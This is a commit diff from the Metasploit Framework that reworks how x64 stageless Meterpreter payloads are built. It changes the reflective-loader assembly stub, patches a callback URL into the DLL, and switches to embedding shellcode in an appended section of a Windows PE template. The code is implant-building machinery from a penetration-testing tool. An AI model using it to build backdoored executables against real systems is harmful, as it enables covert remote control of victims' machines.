More work on x64 stageless

Testing with HD's new changes that allow for generation of larger x64
payloads

Author: OJ

lib/msf/core/payload/windows/x64/stageless_meterpreter.rb

@@ -1,6 +1,7 @@
 #-*- coding: binary -*-
 
 require 'msf/core'
+require 'rex/payloads/meterpreter/patch'
 
 module Msf
 
@@ -19,14 +20,14 @@ module Payload::Windows::StagelessMeterpreter_x64
   def asm_invoke_metsrv(opts={})
     asm = %Q^
         ; prologue
+        ; int 03
           pop r10               ; 'MZ'
-          int 03
           push r10              ; back to where we started
           push rbp              ; save rbp
           mov rbp, rsp          ; set up a new stack frame
           sub rsp, 32           ; allocate some space for calls.
         ; GetPC
-          call $+9              ; relative call to get location
+          call $+5              ; relative call to get location
           pop rbx               ; pop return value
           ;lea rbx, [rel+0]      ; get the VA for the start of this stub
         ; Invoke ReflectiveLoader()
@@ -77,10 +78,12 @@ def generate_stageless_meterpreter(url = nil)
 
     # the URL might not be given, as it might be patched in some other way
     if url
-      url = "s#{url}\x00"
-      location = dll.index("https://#{'X' * 256}")
-      if location
-        dll[location, url.length] = url
+      # Patch the URL using the patcher as this upports both ASCII and WCHAR.
+      unless Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 512}", "s#{url}\x00")
+        # If the patching failed this could mean that we are somehow
+        # working with outdated binaries, so try to patch with the
+        # old stuff.
+        Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 256}", "s#{url}\x00")
       end
     end
 

lib/msf/util/exe.rb

@@ -183,12 +183,8 @@ def self.to_win32pe(framework, code, opts = {})
     payload = win32_rwx_exec(code)
 
     # Create a new PE object and run through sanity checks
-    fsize = File.size(opts[:template])
     pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
 
-    text = nil
-    pe.sections.each {|sec| text = sec if sec.name == ".text"}
-
     #try to inject code into executable by adding a section without affecting executable behavior
     if opts[:inject]
       injector = Msf::Exe::SegmentInjector.new({
@@ -199,6 +195,9 @@ def self.to_win32pe(framework, code, opts = {})
       return injector.generate_pe
     end
 
+    text = nil
+    pe.sections.each {|sec| text = sec if sec.name == ".text"}
+
     raise RuntimeError, "No .text section found in the template" unless text
 
     unless text.contains_rva?(pe.hdr.opt.AddressOfEntryPoint)
@@ -521,19 +520,16 @@ def self.to_win64pe(framework, code, opts = {})
       return injector.generate_pe
     end
 
-    opts[:exe_type] = :exe_sub
-    return exe_sub_method(code,opts)
+    #opts[:exe_type] = :exe_sub
+    #return exe_sub_method(code,opts)
 
-    #
-    # TODO: 64-bit support is currently failing to stage
-    #
     # Append a new section instead
-    # appender = Msf::Exe::SegmentAppender.new({
-    #   :payload  => code,
-    #   :template => opts[:template],
-    #   :arch     => :x64
-    # })
-    # return appender.generate_pe
+    appender = Msf::Exe::SegmentAppender.new({
+      :payload  => code,
+      :template => opts[:template],
+      :arch     => :x64
+    })
+    return appender.generate_pe
   end
 
   # Embeds shellcode within a Windows PE file implementing the Windows

modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb

@@ -26,6 +26,7 @@ def initialize(info = {})
       'Platform'    => 'win',
       'Arch'        => ARCH_X64,
       'Handler'     => Msf::Handler::ReverseTcp,
+      'EncoderType' => Msf::Encoder::Type::Raw,
       'Session'     => Msf::Sessions::Meterpreter_x64_Win
       ))